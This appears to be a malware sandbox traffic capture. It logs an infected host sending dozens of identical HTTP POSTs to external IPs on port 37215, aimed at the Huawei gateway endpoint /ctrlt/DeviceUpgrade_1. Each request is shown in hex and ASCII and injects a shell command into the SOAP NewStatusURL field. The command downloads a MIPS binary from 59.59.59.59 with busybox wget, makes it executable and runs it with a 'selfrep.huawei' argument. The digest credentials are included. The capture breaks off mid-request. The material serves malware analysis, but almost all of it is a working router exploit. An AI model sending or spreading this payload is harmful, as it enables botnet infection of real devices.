                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          2290192.168.2.155304241.72.2.16937215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:28.358264923 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          2291192.168.2.1534694197.221.205.18137215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:28.358282089 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          2292192.168.2.1559398182.66.198.13937215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:28.358753920 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          2293192.168.2.154179841.166.118.1337215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:28.358902931 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          2294192.168.2.154154241.233.247.16537215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:28.367193937 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          2295192.168.2.1546086197.130.200.8237215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:28.367516994 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          2296192.168.2.1538186197.187.168.3037215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:28.368124008 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          2297192.168.2.1541520157.49.205.16737215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:28.368175030 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          2298192.168.2.1550218197.12.84.337215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:28.368465900 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          2299192.168.2.1534662157.38.191.12037215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:28.368798971 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 